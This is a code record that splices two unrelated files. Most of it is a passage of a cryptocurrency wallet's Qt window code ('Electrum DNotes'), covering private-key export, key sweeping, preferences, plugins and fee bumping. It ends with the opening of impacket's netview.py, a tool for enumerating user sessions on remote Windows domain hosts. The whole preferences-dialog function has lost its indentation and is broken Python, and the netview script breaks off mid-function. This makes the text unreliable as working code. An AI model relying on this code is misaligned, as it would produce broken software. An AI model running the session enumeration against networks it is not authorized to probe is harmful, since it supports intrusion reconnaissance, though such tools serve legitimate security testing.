    vbox.addLayout(Buttons(CancelButton(d), b))
    private_keys = {}
    addresses = self.wallet.get_addresses()
    done = False
    cancelled = False
    def privkeys_thread():
        # background worker: derive one key at a time, reporting progress
        for addr in addresses:
            time.sleep(0.1)
            if done or cancelled:
                break
            privkey = self.wallet.export_private_key(addr, password)[0]
            private_keys[addr] = privkey
            self.computing_privkeys_signal.emit()
        if not cancelled:
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.emit()
    def show_privkeys():
        # GUI thread: display the full result and allow export
        s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
        self.show_privkeys_signal.disconnect()
        nonlocal done
        done = True
    def on_dialog_closed(*args):
        nonlocal done
        nonlocal cancelled
        if not done:
            # user closed early: stop the worker and detach signals
            cancelled = True
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.disconnect()
    self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    self.show_privkeys_signal.connect(show_privkeys)
    d.finished.connect(on_dialog_closed)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum DNotes was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(str(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write the ``{address: privkey}`` mapping *pklist* to *fileName*.

    CSV output (header ``address,private_key``, addresses right-padded
    to 34 chars) when *is_csv* is true, otherwise pretty-printed JSON.

    FIX: the file is opened with ``newline=''`` so the csv module
    controls line endings itself — without it, every row is followed by
    a blank line on Windows. Harmless for the JSON branch.
    """
    import json
    with open(fileName, "w+", newline='') as f:
        if is_csv:
            writer = csv.writer(f)
            writer.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                writer.writerow(["%34s" % addr, pk])
        else:
            f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
    """Import wallet labels from a user-chosen file via import_meta_gui."""
    def import_labels(path):
        def _validate(data):
            return data # TODO
        def import_labels_assign(data):
            for key, value in data.items():
                self.wallet.set_label(key, value)
        import_meta(path, _validate, import_labels_assign)
    def on_import():
        # refresh history/address views after labels change
        self.need_update.set()
    import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
    """Export wallet labels to a user-chosen file via export_meta_gui."""
    export_meta_gui(self, _('labels'),
                    lambda filename: export_meta(self.wallet.labels, filename))
def sweep_key_dialog(self):
    """Sweep external private keys into a wallet address.

    Prompts for keys and a destination, then prepares a max-value send
    in the send tab using tx_external_keypairs (signed directly, not via
    the wallet keystore).
    """
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_("Enter private keys:")))
    keys_e = ScanQRTextEdit(allow_multi=True)
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    # prefer an unused receiving address as the destination
    addresses = self.wallet.get_unused_addresses()
    if not addresses:
        try:
            addresses = self.wallet.get_receiving_addresses()
        except AttributeError:
            addresses = self.wallet.get_addresses()
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)   # enabled only when address and keys are valid
    def get_address():
        addr = str(address_e.text()).strip()
        if bitcoin.is_address(addr):
            return addr
    def get_pk():
        text = str(keys_e.toPlainText())
        return keystore.get_private_keys(text)
    f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
    on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
    keys_e.textChanged.connect(f)
    address_e.textChanged.connect(f)
    address_e.textChanged.connect(on_address)
    if not d.exec_():
        return
    from electrum_dnotes.wallet import sweep_preparations
    try:
        self.do_clear()
        coins, keypairs = sweep_preparations(get_pk(), self.network)
        self.tx_external_keypairs = keypairs
        self.spend_coins(coins)
        self.payto_e.setText(get_address())
        self.spend_max()
        self.payto_e.setFrozen(True)
        self.amount_e.setFrozen(True)
    except BaseException as e:
        self.show_message(str(e))
        return
    self.warn_if_watching_only()
def _do_import(self, title, msg, func):
    """Prompt for whitespace-separated keys, apply *func* to each, and
    report which succeeded and which failed, then refresh views."""
    text = text_dialog(self, title, msg + ' :', _('Import'),
                       allow_multi=True)
    if not text:
        return
    good, bad = [], []
    for key in str(text).split():
        try:
            good.append(func(key))
        except BaseException:
            bad.append(key)
    if good:
        self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
    if bad:
        self.show_critical(_("The following inputs could not be imported") + ':\n' + '\n'.join(bad))
    self.address_list.update()
    self.history_list.update()
def import_addresses(self):
    """Prompt for addresses and import them (watching-only wallets)."""
    if not self.wallet.can_import_address():
        return
    self._do_import(_('Import addresses'), _("Enter addresses"),
                    self.wallet.import_address)
@protected
def do_import_privkey(self, password):
    """Prompt for private keys and import them into the wallet
    (password prompted by @protected)."""
    if not self.wallet.can_import_privkey():
        return
    title, msg = _('Import private keys'), _("Enter private keys")
    self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
    """Show/hide fiat widgets and refresh views after an FX toggle."""
    visible = self.fx and self.fx.is_enabled()
    self.fiat_send_e.setVisible(visible)
    self.fiat_receive_e.setVisible(visible)
    for view in (self.history_list, self.address_list):
        view.refresh_headers()
        view.update()
    self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_dnotes.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
#gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['NOTE', 'mNOTE', 'bits']
msg = (_('Base unit of your wallet.')
+ '\n1 NOTE = 1000 mNOTE. 1 mNOTE = 1000 bits.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'NOTE':
self.decimal_point = 8
elif unit_result == 'mNOTE':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
#gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_dnotes import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
#gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
#(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
#(fiat_widgets, _('Fiat')),
#(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum DNotes to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close handler: run window cleanup exactly once, then accept.

    Qt can deliver closeEvent() more than once in rare cases, so the
    cleaned_up flag guards clean_up() against a second invocation.
    """
    if self.cleaned_up:
        event.accept()
        return
    self.cleaned_up = True
    self.clean_up()
    event.accept()
def clean_up(self):
    """Tear down the window: stop background work, persist UI state,
    close auxiliary windows and hand the wallet back to the gui object.
    """
    # stop the wallet's background task thread before touching anything else
    self.wallet.thread.stop()
    if self.network:
        self.network.unregister_callback(self.on_network)
    # persist window geometry; the exact position is only saved when
    # the window is not maximized
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(), g.top(),
                                              g.width(), g.height()])
    # keep only the 50 most recent console entries
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Show the modal plugins dialog: one checkbox row per plugin, plus the
    plugin's own settings widget and a help button where available.
    """
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum DNotes Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400, 250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0, 1)
    w.setLayout(grid)
    # lazily-created per-plugin settings widgets, keyed by plugin name
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        # Create the plugin's settings widget on first use (row i, column 1)
        # and grey it out whenever the plugin is unloaded or disabled.
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        # Load/unload the plugin, then sync checkbox and settings widget.
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        name = descr['__name__']
        p = plugins.get(name)
        # plugins that register a keystore (hardware wallets) are not
        # user-toggleable from this dialog
        if descr.get('registers_keystore'):
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            # enabled when the plugin could be loaded, or is loaded and
            # the user is allowed to disable it
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # a broken plugin description must not prevent the dialog
            # from opening; log and continue with the next plugin
            self.print_msg("error: cannot display plugin", name)
            traceback.print_exc(file=sys.stdout)
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Show the Child-Pays-For-Parent dialog and open the resulting child tx.

    parent_tx: the unconfirmed transaction to accelerate.
    new_tx: template child transaction spending an output of parent_tx;
            its output value bounds the maximum fee that can be attached.

    Fixes over the previous version: fee_e.get_amount() returns None while
    the field is empty/invalid, which used to raise TypeError both in the
    textChanged callback and in the post-dialog comparison; fee amounts are
    now kept as integer satoshis.
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
        "fee/kB settings, applied to the total size of both child and "
        "parent transactions. After you broadcast a CPFP transaction, "
        "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    def f(x):
        # get_amount() is None while the field is empty/invalid; guard so
        # editing the field cannot raise a TypeError on the subtraction.
        fee = fee_e.get_amount()
        a = max_fee - fee if fee is not None else None
        output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
    fee_e.textChanged.connect(f)
    # keep the suggested fee integral (amounts are in satoshis)
    fee = int(self.config.fee_per_kb() * total_size / 1000)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        fee = int(fee_rate * total_size / 1000)
        fee = min(max_fee, fee)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee is None:
        # empty/invalid fee field: nothing to do (previously this raised
        # TypeError on the comparison below)
        return
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    new_tx.set_rbf(True)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Show the fee-bump (Replace-By-Fee) dialog for *tx* and open the
    bumped replacement transaction.

    Fix over the previous version: fee_e.get_amount() returns None while
    the field is empty/invalid, which used to raise TypeError on the
    `new_fee - fee` subtraction; fee amounts are kept as integer satoshis.
    """
    is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    vbox.addWidget(QLabel(_('New fee' + ':')))
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # suggest a 50% bump; keep it an integer number of satoshis
    fee_e.setAmount(int(fee * 1.5))
    vbox.addWidget(fee_e)
    def on_rate(dyn, pos, fee_rate):
        fee = int(fee_rate * tx_size / 1000)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    is_final = cb.isChecked()
    new_fee = fee_e.get_amount()
    if new_fee is None:
        # empty/invalid amount field: previously crashed on the subtraction
        self.show_error(_('Invalid fee'))
        return
    delta = new_fee - fee
    if delta < 0:
        self.show_error("fee too low")
        return
    try:
        new_tx = self.wallet.bump_fee(tx, delta)
    except BaseException as e:
        self.show_error(str(e))
        return
    if is_final:
        new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Try to add *tx* to the wallet history and report the outcome.

    Returns True when the transaction was stored, False otherwise.
    """
    txid = tx.txid()
    try:
        added = self.wallet.add_transaction(txid, tx)
    except AddTransactionException as exc:
        self.show_error(exc)
        return False
    if not added:
        self.show_error(_("Transaction could not be saved.") + "\n" +
                        _("It conflicts with current history."))
        return False
    self.wallet.save_transactions(write=True)
    # need to update at least: history_list, utxo_list, address_list
    self.need_update.set()
    self.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'),
                 _("Transaction added to wallet history"))
    return True
|
netview.py | #!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# beto (@agsolino)
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
#   YOU HAVE TO BE ABLE TO RESOLVE THE DOMAIN MACHINES NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
#
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from Queue import Queue
from time import sleep
from impacket.examples import logger
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
